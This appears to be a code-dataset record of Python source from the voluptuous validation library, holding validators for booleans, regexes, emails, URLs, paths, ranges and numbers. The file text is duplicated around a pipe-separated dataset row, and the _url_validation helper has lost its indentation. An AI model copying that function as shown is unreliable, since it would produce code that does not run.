    Accepted values are 1, true, yes, on, enable, and their negatives.
    Non-string values are cast to bool.
    >>> validate = Schema(Boolean())
    >>> validate(True)
    True
    >>> validate("1")
    True
    >>> validate("0")
    False
    >>> with raises(MultipleInvalid, "expected boolean"):
    ...     validate('moo')
    >>> try:
    ...     validate('moo')
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], BooleanInvalid)
    """
    if isinstance(v, basestring):
        lowered = v.lower()
        if lowered in ('1', 'true', 'yes', 'on', 'enable'):
            return True
        if lowered in ('0', 'false', 'no', 'off', 'disable'):
            return False
        # Any other string -> ValueError, reported by @message.
        raise ValueError
    return bool(v)
class _WithSubValidators(object):
    """Base class for validators that use sub-validators.
    Special class to use as a parent class for validators using sub-validators.
    This class provides the `__voluptuous_compile__` method so the
    sub-validators are compiled by the parent `Schema`.
    """
    def __init__(self, *validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        self.required = kwargs.pop('required', False)
    def __voluptuous_compile__(self, schema):
        # Compile each sub-validator through the parent Schema so they
        # share its configuration.
        self._compiled = []
        for v in self.validators:
            # NOTE(review): this mutates the parent schema's ``required``
            # flag on every sub-compile -- confirm that is intentional.
            schema.required = self.required
            self._compiled.append(schema._compile(v))
        return self._run
    def _run(self, path, value):
        # Entry point used by a compiling Schema (path-aware).
        return self._exec(self._compiled, value, path)
    def __call__(self, v):
        # Stand-alone use (outside a Schema): compile lazily per call.
        return self._exec((Schema(val) for val in self.validators), v)
    def __repr__(self):
        return '%s(%s, msg=%r)' % (
            self.__class__.__name__,
            ", ".join(repr(v) for v in self.validators),
            self.msg
        )
class Any(_WithSubValidators):
    """Use the first validated value.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :returns: Return value of the first validator that passes.
    >>> validate = Schema(Any('true', 'false',
    ...                       All(Any(int, bool), Coerce(bool))))
    >>> validate('true')
    'true'
    >>> validate(1)
    True
    >>> with raises(MultipleInvalid, "not a valid value"):
    ...     validate('moo')
    msg argument is used
    >>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
    >>> validate(1)
    1
    >>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
    ...     validate(4)
    """
    def _exec(self, funcs, v, path=None):
        # Try each sub-validator in order and return the first success.
        error = None
        for func in funcs:
            try:
                if path is None:
                    return func(v)
                else:
                    return func(path, v)
            except Invalid as e:
                # Keep the error with the deepest path: it is the most
                # specific explanation of why nothing matched.
                if error is None or len(e.path) > len(error.path):
                    error = e
        else:
            if error:
                raise error if self.msg is None else AnyInvalid(
                    self.msg, path=path)
            raise AnyInvalid(self.msg or 'no valid value found',
                             path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
    """Value must pass all validators.
    The output of each validator is passed as input to the next.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    >>> validate = Schema(All('10', Coerce(int)))
    >>> validate('10')
    10
    """
    def _exec(self, funcs, v, path=None):
        # Pipeline: each validator's output feeds the next; the first
        # failure aborts the chain.
        try:
            for func in funcs:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
        except Invalid as e:
            raise e if self.msg is None else AllInvalid(self.msg, path=path)
        return v
# Convenience alias
And = All
class Match(object):
    """Value must be a string that matches the regular expression.
    >>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
    >>> validate('0x123EF4')
    '0x123EF4'
    >>> with raises(MultipleInvalid, "does not match regular expression"):
    ...     validate('123EF4')
    >>> with raises(MultipleInvalid, 'expected string or buffer'):
    ...     validate(123)
    Pattern may also be a _compiled regular expression:
    >>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
    >>> validate('0x123ef4')
    '0x123ef4'
    """

    def __init__(self, pattern, msg=None):
        # Accept either a pattern string or an already-compiled regex.
        if isinstance(pattern, basestring):
            pattern = re.compile(pattern)
        self.pattern = pattern
        self.msg = msg

    def __call__(self, v):
        try:
            matched = self.pattern.match(v)
        except TypeError:
            raise MatchInvalid("expected string or buffer")
        if matched:
            return v
        raise MatchInvalid(self.msg or 'does not match regular expression')

    def __repr__(self):
        return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
    """Regex substitution.
    >>> validate = Schema(All(Replace('you', 'I'),
    ...                       Replace('hello', 'goodbye')))
    >>> validate('you say hello')
    'I say goodbye'
    """

    def __init__(self, pattern, substitution, msg=None):
        # Accept either a pattern string or an already-compiled regex.
        if isinstance(pattern, basestring):
            pattern = re.compile(pattern)
        self.pattern = pattern
        self.substitution = substitution
        self.msg = msg

    def __call__(self, v):
        # Never raises for non-matching input: it simply returns v
        # with zero substitutions applied.
        return self.pattern.sub(self.substitution, v)

    def __repr__(self):
        return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
                                            self.substitution,
                                            self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
    """Verify that the value is an Email or not.
    >>> s = Schema(Email())
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...     s("a.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...     s("a@.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...     s("a@.com")
    >>> s('t@x.com')
    't@x.com'
    """
    try:
        if not v or "@" not in v:
            raise EmailInvalid("Invalid Email")
        # Split on the LAST '@' so quoted local parts containing '@' work.
        user_part, domain_part = v.rsplit('@', 1)
        if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
            raise EmailInvalid("Invalid Email")
        return v
    except Exception:
        # Normalize every failure (including EmailInvalid) to ValueError so
        # the @message decorator reports it uniformly.  Was a bare
        # ``except:``, which also swallowed KeyboardInterrupt/SystemExit.
        raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a Fully qualified domain name URL.
    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...     s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        parsed_url = _url_validation(v)
        # A fully qualified name must contain at least one dot in the host.
        if "." not in parsed_url.netloc:
            raise UrlInvalid("must have a domain name in URL")
        return v
    except Exception:
        # Normalize every failure to ValueError so the @message decorator
        # reports it as UrlInvalid.  Was a bare ``except:``, which also
        # swallowed KeyboardInterrupt/SystemExit.
        raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.
    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...     s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        _url_validation(v)
        return v
    except Exception:
        # Normalize every failure to ValueError so the @message decorator
        # reports it as UrlInvalid.  Was a bare ``except:``, which also
        # swallowed KeyboardInterrupt/SystemExit.
        raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.
    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...     IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...     IsFile()(None)
    """
    try:
        # Falsy values (None, '') can never name an existing file.
        if not v:
            raise FileInvalid('Not a file')
        return os.path.isfile(str(v))
    except TypeError:
        raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.
    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...     IsDir()(None)
    """
    try:
        if v:
            v = str(v)
            return os.path.isdir(v)
        else:
            # Falsy values (None, '') can never name an existing directory.
            raise DirInvalid("Not a directory")
    except TypeError:
        raise DirInvalid("Not a directory")


# The IsDir body above was missing, leaving its decorators stacked onto
# PathExists (four decorators on one function).  Restored as two validators.
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
    """Verify the path exists, regardless of its type.
    >>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
    True
    >>> with raises(Invalid, 'path does not exist'):
    ...     PathExists()("random_filename_goes_here.py")
    >>> with raises(PathInvalid, 'Not a Path'):
    ...     PathExists()(None)
    """
    try:
        if v:
            v = str(v)
            return os.path.exists(v)
        else:
            # Falsy values (None, '') can never name an existing path.
            raise PathInvalid("Not a Path")
    except TypeError:
        raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.
    :raises Invalid: if the value does not match the given validator and is not
        None
    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...     s("string")
    """
    # None is tried first; anything else must satisfy the wrapped validator.
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.
    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.
    :raises Invalid: If the value is outside the range.
    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...     s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...     s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...     Schema(Range(max=10, max_included=False))(20)
    """
    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        self.min_included = min_included
        self.max_included = max_included
        self.msg = msg
    def __call__(self, v):
        # Written as ``not v >= self.min`` (rather than ``v < self.min``)
        # so values failing every comparison (e.g. NaN) are rejected.
        if self.min_included:
            if self.min is not None and not v >= self.min:
                raise RangeInvalid(
                    self.msg or 'value must be at least %s' % self.min)
        else:
            if self.min is not None and not v > self.min:
                raise RangeInvalid(
                    self.msg or 'value must be higher than %s' % self.min)
        if self.max_included:
            if self.max is not None and not v <= self.max:
                raise RangeInvalid(
                    self.msg or 'value must be at most %s' % self.max)
        else:
            if self.max is not None and not v < self.max:
                raise RangeInvalid(
                    self.msg or 'value must be lower than %s' % self.max)
        return v
    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.
    Either min or max may be omitted.
    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """
    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg
    def __call__(self, v):
        # Never raises: out-of-range input is pulled to the nearest bound.
        if self.min is not None and v < self.min:
            v = self.min
        if self.max is not None and v > self.max:
            v = self.max
        return v
    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""
    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg
    def __call__(self, v):
        # len() is only evaluated when a bound is set, so unbounded
        # Length() accepts values without __len__.
        if self.min is not None and len(v) < self.min:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        if self.max is not None and len(v) > self.max:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v
    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""
    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
    def __init__(self, format=None, msg=None):
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg
    def __call__(self, v):
        # Only parseability is checked; the original string is returned.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DatetimeInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v
    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""
    DEFAULT_FORMAT = '%Y-%m-%d'
    def __call__(self, v):
        # Same check as Datetime but raises DateInvalid instead.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DateInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v
    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""
    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg
    def __call__(self, v):
        # An unhashable value makes ``in`` raise TypeError for hashed
        # containers; treat that the same as "not found".
        try:
            check = v not in self.container
        except TypeError:
            check = True
        if check:
            raise InInvalid(self.msg or 'value is not allowed')
        return v
    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""
    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg
    def __call__(self, v):
        # An unhashable value is treated as a failure, mirroring In.
        try:
            check = v in self.container
        except TypeError:
            check = True
        if check:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v
    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.
    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...     s([3, 2])
    """
    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg
    def __call__(self, v):
        # A non-container value makes ``in`` raise TypeError; treat it
        # the same as "item not present".
        try:
            check = self.item not in v
        except TypeError:
            check = True
        if check:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v
    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
        constructors.
    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """
    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # Compile each positional validator into a Schema once, up front.
        self._schemas = [Schema(val, **kwargs) for val in validators]
    def __call__(self, v):
        # Must be a list/tuple of exactly the declared length.
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            # type(v)(...) preserves the input's container type.
            v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
        except Invalid as e:
            raise e if self.msg is None else ExactSequenceInvalid(self.msg)
        return v
    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.
    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__).
    JSON does not support set, so they need to be presented as arrays.
    Unique allows ensuring that such array does not contain dupes.
    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...     s([1, 1, 2])
    >>> with raises(Invalid, "contains duplicate items: ['one']"):
    ...     s(['one', 'two', 'one'])
    >>> with raises(Invalid, regex="^contains unhashable elements: "):
    ...     s([set([1, 2]), set([3, 4])])
    >>> s('abc')
    'abc'
    >>> with raises(Invalid, regex="^contains duplicate items: "):
    ...     s('aabbc')
    """
    def __init__(self, msg=None):
        self.msg = msg
    def __call__(self, v):
        try:
            set_v = set(v)
        except TypeError as e:
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(e))
        if len(set_v) != len(v):
            # Second pass only on failure: collect the duplicates for the
            # error message (set.add returns None, so the or-trick keeps
            # items that were already seen).
            seen = set()
            dupes = list(set(x for x in v if x in seen or seen.add(x)))
            raise Invalid(
                self.msg or 'contains duplicate items: {0}'.format(dupes))
        return v
    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.
    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...     s(2)
    Validators are not supported, match must be exact:
    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...     s('foo')
    """
    def __init__(self, target, msg=None):
        self.target = target
        self.msg = msg
    def __call__(self, v):
        # Plain equality only; the target is never treated as a validator.
        if v != self.target:
            raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
        return v
    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.
    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """
    def __init__(self, validators, msg=None, **kwargs):
        # Pre-compile every validator into a Schema once, up front.
        self.validators = validators
        self.msg = msg
        self._schemas = [Schema(val, **kwargs) for val in validators]
    def __call__(self, v):
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        # Greedy one-to-one matching: each element consumes the first
        # still-unused schema that accepts it.
        # NOTE(review): greedy matching is order-sensitive -- kept as-is.
        consumed = set()
        missing = []
        for index, value in enumerate(v):
            found = False
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        # Single failure -> one Invalid; several -> MultipleInvalid.
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v
    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """
    Verify the number of digits that are present in the number(Precision),
    and the decimal places(Scale)
    :raises Invalid: If the value does not match the provided Precision and Scale.
    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """

    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        # precision: expected count of significant digits.
        # scale: expected count of digits right of the decimal point.
        # yield_decimal: return the parsed Decimal instead of the raw input.
        self.precision = precision
        self.scale = scale
        self.msg = msg
        self.yield_decimal = yield_decimal

    def __call__(self, v):
        """
        :param v: is a number enclosed with string
        :return: Decimal number
        """
        precision, scale, decimal_num = self._get_precision_scale(v)
        # When both constraints are configured and BOTH are violated, emit
        # one combined error; otherwise report each violation on its own.
        if self.precision is not None and self.scale is not None and precision != self.precision\
                and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                        self.scale))
        else:
            if self.precision is not None and precision != self.precision:
                raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
            if self.scale is not None and scale != self.scale:
                raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
        if self.yield_decimal:
            return decimal_num
        else:
            return v

    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))

    def _get_precision_scale(self, number):
        """
        :param number:
        :return: tuple(precision, scale, decimal_number)
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')
        # precision = significand digit count; scale = -exponent, i.e. the
        # digits right of the decimal point (can be negative, e.g. '1e3').
        return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.
    The output of each validator is passed as input to the next.
    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met
    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...   validate(6.2)
    """

    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        # Unset bounds default to the loosest possible constraint.
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)

    def _exec(self, funcs, v, path=None):
        errors = []
        funcs = list(funcs)
        for func in funcs:
            try:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)
        # NOTE(review): v is threaded through every *successful* validator,
        # so later validators see earlier validators' output.
        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v
        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))
        if passed_count > self.max_valid:
            raise TooManyValid(msg)
        raise NotEnoughValid(msg)

    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | PathExists | python | def PathExists(v):
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path") | Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L471-L488 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
# Local-part of an email address: either a dot-atom or a quoted-string.
USER_REGEX = re.compile(
    # dot-atom
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
    # quoted-string
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r"""\\[\001-\011\013\014\016-\177])*"$)""",
    re.IGNORECASE
)
# Domain part: a dotted hostname, or an IPv4 address literal in brackets.
DOMAIN_REGEX = re.compile(
    # domain
    r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
    r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
    # literal form, ipv4 address (SMTP 4.1.3)
    r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE)

__author__ = 'tusharmakkar08'
def truth(f):
    """Turn a predicate into a validator.

    The wrapped function must return a truthy value for valid input; a
    falsy result is converted into ``ValueError`` so that ``Schema``
    reports ``not a valid value``.

    >>> @truth
    ... def isdir(v):
    ...   return os.path.isdir(v)
    >>> validate = Schema(isdir)
    >>> validate('/')
    '/'
    >>> with raises(MultipleInvalid, 'not a valid value'):
    ...   validate('/notavaliddir')
    """
    @wraps(f)
    def check(v):
        if not f(v):
            raise ValueError
        return v
    return check
class Coerce(object):
    """Coerce a value to a type.

    Validation fails with ``CoerceInvalid`` when the constructor raises
    ``ValueError``, ``TypeError`` or ``decimal.InvalidOperation``.

    >>> validate = Schema(Coerce(int))
    >>> with raises(MultipleInvalid, 'expected int'):
    ...   validate('foo')
    >>> validate = Schema(Coerce(int, "moo"))
    >>> with raises(MultipleInvalid, 'moo'):
    ...   validate('foo')
    """

    def __init__(self, type, msg=None):
        self.type = type
        self.msg = msg
        # Cached for error messages and __repr__.
        self.type_name = type.__name__

    def __call__(self, v):
        try:
            return self.type(v)
        except (ValueError, TypeError, InvalidOperation):
            raise CoerceInvalid(self.msg or 'expected %s' % self.type_name)

    def __repr__(self):
        return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
    """Assert that a value is true, in the Python sense.
    >>> validate = Schema(IsTrue())
    "In the Python sense" means that implicitly false values, such as empty
    lists, dictionaries, etc. are treated as "false":
    >>> with raises(MultipleInvalid, "value was not true"):
    ...   validate([])
    >>> validate([1])
    [1]
    >>> with raises(MultipleInvalid, "value was not true"):
    ...   validate(False)
    ...and so on.
    >>> try:
    ...   validate([])
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], TrueInvalid)
    """
    # @truth raises ValueError when this returns a falsy value, and
    # @message then reports it as TrueInvalid('value was not true').
    return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
    """Assert that a value is false, in the Python sense.

    (see :func:`IsTrue` for more detail)

    >>> validate = Schema(IsFalse())
    >>> validate([])
    []
    >>> with raises(MultipleInvalid, "value was not false"):
    ...   validate(True)
    """
    # Falsy values pass through unchanged; anything truthy is rejected
    # (ValueError is converted by @message into FalseInvalid).
    if not v:
        return v
    raise ValueError
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
    """Convert human-readable boolean values to a bool.

    Accepted strings are 1/true/yes/on/enable and their negatives
    (case-insensitive); any other string is rejected. Non-string values
    are simply cast with ``bool``.

    >>> validate = Schema(Boolean())
    >>> validate(True)
    True
    >>> validate("1")
    True
    >>> validate("0")
    False
    >>> with raises(MultipleInvalid, "expected boolean"):
    ...   validate('moo')
    """
    if isinstance(v, basestring):
        lowered = v.lower()
        if lowered in ('1', 'true', 'yes', 'on', 'enable'):
            return True
        if lowered in ('0', 'false', 'no', 'off', 'disable'):
            return False
        # Unrecognised strings become BooleanInvalid via @message.
        raise ValueError
    return bool(v)
class _WithSubValidators(object):
    """Base class for validators that use sub-validators.
    Special class to use as a parent class for validators using sub-validators.
    This class provides the `__voluptuous_compile__` method so the
    sub-validators are compiled by the parent `Schema`.
    """

    def __init__(self, *validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        self.required = kwargs.pop('required', False)

    def __voluptuous_compile__(self, schema):
        # Compile each sub-validator through the parent schema so nested
        # error paths are tracked correctly.
        self._compiled = []
        for v in self.validators:
            # NOTE(review): mutates the parent schema's `required` flag in
            # place before each compile -- presumably so the sub-schemas
            # inherit this validator's `required` setting; confirm upstream.
            schema.required = self.required
            self._compiled.append(schema._compile(v))
        return self._run

    def _run(self, path, value):
        # Entry point used by a compiled parent Schema.
        return self._exec(self._compiled, value, path)

    def __call__(self, v):
        # Entry point when invoked directly (uncompiled): wrap each
        # sub-validator in a fresh Schema on the fly.
        return self._exec((Schema(val) for val in self.validators), v)

    def __repr__(self):
        return '%s(%s, msg=%r)' % (
            self.__class__.__name__,
            ", ".join(repr(v) for v in self.validators),
            self.msg
        )
class Any(_WithSubValidators):
    """Use the first validated value.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :returns: Return value of the first validator that passes.
    >>> validate = Schema(Any('true', 'false',
    ...                       All(Any(int, bool), Coerce(bool))))
    >>> validate('true')
    'true'
    >>> validate(1)
    True
    >>> with raises(MultipleInvalid, "not a valid value"):
    ...   validate('moo')
    msg argument is used
    >>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
    >>> validate(1)
    1
    >>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
    ...   validate(4)
    """

    def _exec(self, funcs, v, path=None):
        # Try each sub-validator in order; the first success wins.
        error = None
        for func in funcs:
            try:
                if path is None:
                    return func(v)
                else:
                    return func(path, v)
            except Invalid as e:
                # Keep the error with the deepest path: it is the most
                # specific and therefore most useful to report.
                if error is None or len(e.path) > len(error.path):
                    error = e
        else:
            if error:
                raise error if self.msg is None else AnyInvalid(
                    self.msg, path=path)
            raise AnyInvalid(self.msg or 'no valid value found',
                             path=path)


# Convenience alias
Or = Any
class All(_WithSubValidators):
    """Value must pass all validators.

    The output of each validator is passed as input to the next.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.

    >>> validate = Schema(All('10', Coerce(int)))
    >>> validate('10')
    10
    """

    def _exec(self, funcs, v, path=None):
        try:
            # Pipe the value through every validator in sequence.
            for func in funcs:
                v = func(v) if path is None else func(path, v)
        except Invalid as e:
            if self.msg is None:
                raise e
            raise AllInvalid(self.msg, path=path)
        return v


# Convenience alias
And = All
class Match(object):
    """Value must be a string that matches the regular expression.

    >>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
    >>> validate('0x123EF4')
